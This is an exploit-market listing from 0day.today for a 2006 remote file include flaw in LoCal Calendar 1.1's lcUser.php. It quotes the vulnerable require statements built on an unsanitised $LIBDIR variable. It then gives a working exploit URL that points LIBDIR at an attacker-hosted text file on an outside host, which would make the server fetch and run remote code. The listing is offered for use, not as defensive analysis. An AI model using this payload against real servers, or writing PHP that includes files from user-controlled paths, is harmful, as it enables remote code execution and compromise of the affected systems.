[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LoCal Calendar 1.1 (lcUser.php) Remote File Include Vulnerability

Author
o0xxdark0o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1025
Category
web applications
Date add
17-10-2006
Platform
unsorted
=================================================================
LoCal Calendar 1.1 (lcUser.php) Remote File Include Vulnerability
=================================================================



+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcUser.php) Remote File Include
---------------------------------------------------------------------------------------------
An advanced instrumentation reservation system for equipment calendaring and user management.
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------
screenshot : http://www.loci.wisc.edu/calendar/tutorial/monthview.jpg
--------------------------------------------------------------------------------------------
code :
require "$LIBDIR/lcMembership.inc";
require "$LIBDIR/lcErrorChecker.inc";
--------------------------------------------------------------------------------------------
exploit:
local/lib/lcUser.php?LIBDIR=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
--------------------------------------------------------------------------
greetz :
:( no one
-------------------------------------------------------------------------
by o0xxdark0o
i think... so that... i m here
##---------------------------------------------------------------------------------------------------



#  0day.today [2024-12-26]  #